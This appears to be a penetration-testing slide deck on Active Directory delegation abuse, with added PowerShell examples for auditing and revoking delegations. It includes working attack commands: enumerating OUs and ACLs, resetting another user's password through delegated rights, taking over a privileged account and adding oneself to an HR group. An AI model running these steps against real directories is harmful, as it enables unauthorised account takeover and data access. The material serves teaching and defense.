Active Directory Delegation - By @rebootuser

A brief overview of reviewing Active Directory Delegation in a pentest

  1. Active Directory Delegation
  2. AD Dele-What?
     “…Active Directory delegation is a critical part of many organisations' IT infrastructure. By delegating administration, you can grant users or groups only the permissions they need without adding users to privileged groups (e.g., Domain Admins, Account Operators)…”*
     * [source]
  3. Requirements
     • Windows Remote Administration Toolkit
     • Windows attacking host with Admin Privileges
     • Patience and Enumeration Skills!
  4. AD PowerShell Cmdlets
     • Import the AD PowerShell module on the attacking host
     • The attack box isn’t part of the victim domain, so the AD drive cannot load
         $Env:ADPS_LoadDefaultDrive = 0
         Import-Module ActiveDirectory
  5. LDAP Overview
     Terminology
     • CN = Common Name
     • OU = Organizational Unit
     • DC = Domain Component
         CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
  6. Exercise
     We (most likely) need:
     • User credentials of some sort…
     Questions to ask:
     • What’s the Domain name / Distinguished Name (DN)?
  7. Enumeration
         Get-ADDomain -Server -Credential "rebootuser\bob"
     Redacted Output:
         DistinguishedName    : DC=rebootuser,DC=local
         DNSRoot              : rebootuser.local
         DomainMode           : Windows2012Domain
         DomainSID            : S-1-5-21-3305272636-1761470839-3168806703
         Forest               : rebootuser.local
         InfrastructureMaster : DC-01.rebootuser.local
         NetBIOSName          : REBOOTUSER
         PDCEmulator          : DC-01.rebootuser.local
         RIDMaster            : DC-01.rebootuser.local
         SystemsContainer     : CN=System,DC=rebootuser,DC=local
         UsersContainer       : CN=Users,DC=rebootuser,DC=local
  8. Exercise
     We have access to bob’s account
     Questions to ask:
     • Where does bob's account reside?
     • Anything ‘interesting’ leaked from his account info?
  9. Account Enumeration
         Get-ADUser -Identity "bob" -Server -Credential "rebootuser\bob" -Properties *
     Redacted Output:
         DistinguishedName : CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
         Description       : 1st Line Support
         HomeDirectory     : \\DC-01\Share$\Home\Bob
  10. Exercise
     Questions to ask:
     • How is the LDAP environment structured?
     • Where do user accounts reside?
  11. Enumeration is Slow….
         $username = "rebootuser\bob"
         $password = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force
         $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $password
         # one query per OU: list the OU's DN, then the users directly beneath it
         $diname = Get-ADOrganizationalUnit -Filter * -SearchBase "dc=rebootuser,dc=local" -Properties canonicalname -Server -Credential $cred | Select-Object distinguishedname
         foreach ($i in $diname) {
             Write-Output $i.distinguishedname
             Get-ADUser -SearchBase $i.distinguishedname -Filter * -SearchScope OneLevel -Server -Credential $cred | Format-List SamAccountName
         }
  12. Enumeration is Slow….
         OU=Sales,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
         SamAccountName : sue
         OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
         SamAccountName : bob
         SamAccountName : jeff
         OU=Management,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local
         SamAccountName : tim
         OU=Marketing,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local
         SamAccountName : jimmy
         OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
         SamAccountName : godmode
         OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
         SamAccountName : sally
  13. Exercise
     We’ve identified a number of custom OUs
     Questions to ask:
     • Do any users/groups hold delegation rights over any OUs within the environment?
  14. Introducing ACL Scanner
     • OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
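The deck shows ACL Scanner's output as screenshots. The following added example (not from the deck or from ACL Scanner) answers the same question with the AD module alone: it maps the ActiveDirectory provider against the remote DC, lists every explicit, non-inherited ACE on the Support OU and each OU above it, and translates the ObjectType GUIDs into attribute and extended-right names so that a "reset password" delegation reads as such. It assumes the AD module is loaded as on slide 4, that the credential can read the OUs' security descriptors, and that the DC name is the one from the slide 7 output; the list of default trustees is a constructed allow-list and should be adjusted to the environment.

```powershell
# Added example: enumerate explicit (non-inherited) delegation ACEs on an OU chain
# and resolve ObjectType GUIDs to attribute / extended-right names.
Import-Module ActiveDirectory
$Env:ADPS_LoadDefaultDrive = 0

$dc   = "DC-01.rebootuser.local"            # DC from the deck's Get-ADDomain output
$cred = Get-Credential "rebootuser\bob"     # prompts for the password
$ou   = "OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local"

# The default AD: drive is disabled on a non-domain-joined box, so map one explicitly.
New-PSDrive -Name REB -PSProvider ActiveDirectory -Root "" -Server $dc -Credential $cred | Out-Null

# GUID -> name table: schema objects (attributes/classes) plus control access rights
# from the Extended-Rights container (password reset lives here).
$rootDse = Get-ADRootDSE -Server $dc -Credential $cred
$guidMap = @{}
Get-ADObject -SearchBase $rootDse.schemaNamingContext -LDAPFilter "(schemaIDGUID=*)" `
    -Properties name, schemaIDGUID -Server $dc -Credential $cred |
    ForEach-Object { $guidMap[([guid]$_.schemaIDGUID).ToString()] = $_.name }
Get-ADObject -SearchBase "CN=Extended-Rights,$($rootDse.configurationNamingContext)" `
    -LDAPFilter "(objectClass=controlAccessRight)" -Properties name, rightsGUID `
    -Server $dc -Credential $cred |
    ForEach-Object { $guidMap[([guid]$_.rightsGUID).ToString()] = $_.name }

# Constructed allow-list: trustees expected on every OU. Anything else is a delegation to review.
$defaultTrustees = @("NT AUTHORITY\SYSTEM", "NT AUTHORITY\SELF", "NT AUTHORITY\Authenticated Users",
                     "BUILTIN\Administrators", "BUILTIN\Pre-Windows 2000 Compatible Access",
                     "REBOOTUSER\Domain Admins", "REBOOTUSER\Enterprise Admins")

function Get-DelegatedAce {
    param([string]$DistinguishedName)
    $acl = Get-Acl -Path "REB:\$DistinguishedName"
    $acl.Access |
        Where-Object { -not $_.IsInherited -and $defaultTrustees -notcontains $_.IdentityReference.Value } |
        ForEach-Object {
            $guid = $_.ObjectType.ToString()
            [pscustomobject]@{
                OU        = $DistinguishedName
                Trustee   = $_.IdentityReference.Value
                Type      = $_.AccessControlType
                Rights    = $_.ActiveDirectoryRights
                # An all-zero ObjectType means the right covers the whole object, not one attribute/right
                AppliesTo = if ($guid -eq [guid]::Empty.ToString()) { "<all>" }
                            elseif ($guidMap.ContainsKey($guid)) { $guidMap[$guid] } else { $guid }
                Inherits  = $_.InheritanceType
            }
        }
}

# Walk from the Support OU up to the domain root: rights are usually granted on a
# parent OU and only appear as inherited ACEs on the children.
$path = $ou
while ($path -match '^OU=') {
    Get-DelegatedAce -DistinguishedName $path
    $path = ($path -split '(?<!\\),', 2)[1]   # drop the leading RDN; "\," is an escaped comma, not a separator
}
```

Reading the output: a row whose Trustee is it_support_limited with Rights ExtendedRight and AppliesTo "User-Force-Change-Password", with Inherits set to Descendents, is the password-reset delegation the deck goes on to use. Because the scan reports each right on the OU where it is actually granted, it also tells you where a revocation has to happen.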
  15. Exercise
     We’ve identified 2 groups:
     • it_support_limited (some delegated rights) and
     • it_support_priv (many delegated rights)
     Questions to ask:
     • Users that have membership of either group
  16. Group Memberships
         Get-ADGroupMember -Identity "it_support_limited" -Server -Credential "rebootuser\bob" | Select-Object ObjectClass, SamAccountName
         Get-ADGroupMember -Identity "it_support_priv" -Server -Credential "rebootuser\bob" | Select-Object ObjectClass, SamAccountName
  17. Exercise
     OK, Bob (a member of “it_support_limited”) has the reset password right over the Support OU
     Questions to ask:
     • Where does Jeff’s (or any other ‘useful’) account reside?
  18. Abuse of Privilege…
     • Looking at the previous enumeration results we see that Jeff is also in the Support OU
         OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
         SamAccountName : bob
         SamAccountName : jeff
     • Let's change his password!
         Set-ADAccountPassword 'cn=jeff,ou=support,ou=users,ou=cambridge,ou=uk,ou=offices,dc=rebootuser,dc=local' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "P@ssw0rd" -Force) -Server -Credential "rebootuser\bob"
     To cut a long story short (and skip many, many more slides of enumeration): it_support_limited has password reset rights over the UK OU and its child entities, and it_support_priv has all possible delegation rights over the entire Offices OU and its child entities.
  19. Exercise
     Now we’ve inherited Jeff’s powerful delegation rights over the entire Offices OU and sub entities!
     Questions to ask:
     • Are there any privileged accounts we can commandeer?
  20. PWN all the Admins!
     • From earlier recon we found an interesting user, godmode:
         OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
     • Which groups is godmode a member of?
         Get-ADPrincipalGroupMembership godmode -Server -Credential "rebootuser\jeff" | Select-Object name
     • Ah, excellent, Jeff has delegation rights here, let's change the password….
  21. AdminSDHolder & SDProp
     • AdminSDHolder is a container that exists in each AD domain
     • A protected group is an Active Directory group that is identified as a privileged group. This group and all its members should be protected from unintentional modifications*
     • When an AD group is marked as a protected group, AD will ensure that the owner, the ACLs and the inheritance applied on this group are the same as the ones applied on the AdminSDHolder container*
     * [source]
  22. AdminSDHolder – Who/What/Eh?
         Get-ADGroup -LDAPFilter "(admincount=1)" -Server -Credential "rebootuser\jeff" | Select-Object SamAccountName
         Get-ADUser -LDAPFilter "(admincount=1)" -Server -Credential "rebootuser\jeff" | Select-Object SamAccountName
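The two queries above list what SDProp has stamped, but adminCount=1 is never cleared automatically: an account removed from a protected group keeps the flag and the locked-down AdminSDHolder ACL, and a freshly added member is not stamped until the next SDProp pass. The added example below (not from the deck) cross-checks the flag against transitive membership of the protected groups, which is the standard audit for both conditions. It assumes the AD module is loaded and the credential can read group membership; the DC name is the one from the slide 7 output.

```powershell
# Added example: reconcile adminCount=1 with actual protected-group membership.
Import-Module ActiveDirectory
$Env:ADPS_LoadDefaultDrive = 0
$dc   = "DC-01.rebootuser.local"
$cred = Get-Credential "rebootuser\bob"

# Groups SDProp treats as protected: the deck's admincount=1 group query
$protectedGroups = @(Get-ADGroup -LDAPFilter "(admincount=1)" -Server $dc -Credential $cred)

# Transitive membership of every protected group, keyed by SID so a user counted
# via several groups appears once
$protectedMembers = @{}
foreach ($g in $protectedGroups) {
    Get-ADGroupMember -Identity $g -Recursive -Server $dc -Credential $cred |
        Where-Object { $_.objectClass -eq 'user' } |
        ForEach-Object { $protectedMembers[$_.SID.Value] = $_.SamAccountName }
}

# Users carrying the flag right now
$flagged     = @(Get-ADUser -LDAPFilter "(admincount=1)" -Properties adminCount -Server $dc -Credential $cred)
$flaggedSids = @($flagged | ForEach-Object { $_.SID.Value })

# Flagged but in no protected group: leftover from a past privileged membership.
# krbtgt normally shows up here by design, since it is stamped without a group.
$orphaned = @($flagged | Where-Object { -not $protectedMembers.ContainsKey($_.SID.Value) })

# In a protected group but not yet flagged: SDProp (hourly by default) has not run since the add.
$unstamped = @($protectedMembers.Keys | Where-Object { $flaggedSids -notcontains $_ } |
               ForEach-Object { $protectedMembers[$_] })

"Protected groups        : " + ($protectedGroups.SamAccountName -join ', ')
"Flagged users           : " + ($flagged.SamAccountName -join ', ')
"Orphaned adminCount=1   : " + ($orphaned.SamAccountName -join ', ')
"Members not yet stamped : " + ($unstamped -join ', ')
```

From a pentest viewpoint the orphaned list points at accounts that used to be privileged; from a defender's it is the list to clean up (clear adminCount and re-enable inheritance) so that those accounts stop being shielded from the OU delegations that are supposed to manage them.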
  23. Needing Direction
     • So where do we go from here?
     • We have powerful delegation rights – we can change passwords, modify group memberships, add groups/users etc.
     • DA is not necessarily the end goal
     • Sensitive data is likely to be stored in group drives:
       • If we recall, Bob's home directory resides in the following location:
           HomeDirectory : \\DC-01\Share$\Home\Bob
       • HR
       • Finance
       • IT
       • Management
       • …the list goes on
  24. Exercise
     There are many directions we could take…
     Questions to ask:
     • DA is off the table (for now), but are there any other sensitive groups we can pwn?
  25. Group Enumeration
     • Automated group enumeration – I won’t bore you with the PS query!
         OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
         SamAccountName : IT_support_limited
         SamAccountName : IT_support_priv
         SamAccountName : it_users
         SamAccountName : the_privileged_few
         OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
         SamAccountName : hr_users
     • We (Jeff) have delegation rights here - let's add ourselves (bob) to this group!
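Slides 11 and 12 issue one LDAP query per OU for users, and slide 25 withholds the equivalent group query. The added example below (not from the deck) covers both with one subtree query per object class and groups the results by parent container on the client, which is both faster and free of the per-OU loop's blind spot for objects that live in containers rather than OUs. It assumes the AD module is loaded and uses the DC and domain DN from the slide 7 output.

```powershell
# Added example: enumerate users or groups across the whole domain in one query,
# grouped by their parent container.
Import-Module ActiveDirectory
$Env:ADPS_LoadDefaultDrive = 0
$dc   = "DC-01.rebootuser.local"
$cred = Get-Credential "rebootuser\bob"
$base = "DC=rebootuser,DC=local"

function Get-ParentDn {
    # Drop the leading RDN. A comma preceded by a backslash (e.g. "CN=Smith\, Bob")
    # is part of the value, not a component separator, so split on unescaped commas only.
    param([string]$DistinguishedName)
    ($DistinguishedName -split '(?<!\\),', 2)[1]
}

function Get-ObjectsByContainer {
    param([ValidateSet('user', 'group')][string]$Class)
    # Subtree search from the domain root; default paging returns every match
    $objects = if ($Class -eq 'user') {
        Get-ADUser  -Filter * -SearchBase $base -Server $dc -Credential $cred -Properties description
    } else {
        Get-ADGroup -Filter * -SearchBase $base -Server $dc -Credential $cred -Properties description
    }
    $objects |
        Group-Object -Property { Get-ParentDn $_.DistinguishedName } |
        Sort-Object Name |
        ForEach-Object {
            $_.Name                                   # the container / OU DN
            $_.Group | Sort-Object SamAccountName | ForEach-Object {
                "    {0,-24} {1}" -f $_.SamAccountName, $_.description
            }
        }
}

Get-ObjectsByContainer -Class user
Get-ObjectsByContainer -Class group
```

Printing the description alongside each name is deliberate: slide 9 shows that field leaking a job role, and group descriptions tend to say outright what a group like the_privileged_few is for.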
  26. Delegation Disaster! DEMO
  27. Final Thoughts
     • Complex environments could easily falter in delegation assignments
     • Microsoft provide a nice wizard interface for assigning permissions… ….revoking permissions is not such a straightforward approach
     • Often overlooked in pentests, but a prime target!
     • Dsrevoke
     • PowerShell
     • ADUC > Advanced View > Security Tab
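The PowerShell route to revoking a delegation is the same Get-Acl/Set-Acl pair that the ADUC Security tab drives, applied to the OU where the right was granted rather than to the children that inherit it. The added example below (not from the deck) removes every explicit ACE held by one trustee on an OU, with a dry run first; it assumes the AD module is loaded, a credential with WriteDacl on the OU ("rebootuser\admin" is a placeholder, not an account from the deck), and uses the Offices OU and it_support_priv group named on slide 18.

```powershell
# Added example: revoke all explicit ACEs for one trustee on an OU (dry run by default).
Import-Module ActiveDirectory
$Env:ADPS_LoadDefaultDrive = 0
$dc      = "DC-01.rebootuser.local"
$cred    = Get-Credential "rebootuser\admin"        # placeholder: an account allowed to write the OU's DACL
$ou      = "OU=Offices,DC=rebootuser,DC=local"      # slide 18: it_support_priv holds full rights here
$trustee = "REBOOTUSER\it_support_priv"

New-PSDrive -Name REB -PSProvider ActiveDirectory -Root "" -Server $dc -Credential $cred | Out-Null

function Remove-DelegatedAce {
    param([string]$DistinguishedName, [string]$Trustee, [switch]$Apply)
    $acl = Get-Acl -Path "REB:\$DistinguishedName"
    # Only explicit ACEs can be removed here; inherited ones must be revoked on the parent
    $targets = @($acl.Access | Where-Object {
        -not $_.IsInherited -and $_.IdentityReference.Value -eq $Trustee })
    if ($targets.Count -eq 0) { "No explicit ACEs for $Trustee on $DistinguishedName"; return }
    foreach ($ace in $targets) {
        "{0} {1} {2} {3} (ObjectType {4})" -f $(if ($Apply) { 'Removing' } else { 'Would remove' }),
            $ace.AccessControlType, $ace.ActiveDirectoryRights, $ace.InheritanceType, $ace.ObjectType
        if ($Apply) { [void]$acl.RemoveAccessRule($ace) }
    }
    # Writing the modified DACL back also drops the ACEs that child OUs inherited from it
    if ($Apply) { Set-Acl -Path "REB:\$DistinguishedName" -AclObject $acl }
}

Remove-DelegatedAce -DistinguishedName $ou -Trustee $trustee            # dry run: print what would go
# Remove-DelegatedAce -DistinguishedName $ou -Trustee $trustee -Apply   # run once the list has been reviewed
```

Re-running the dry run after the apply should report no explicit ACEs for the trustee; if a right still shows on a child OU as inherited, it was granted higher up and the same function needs to be pointed at that parent.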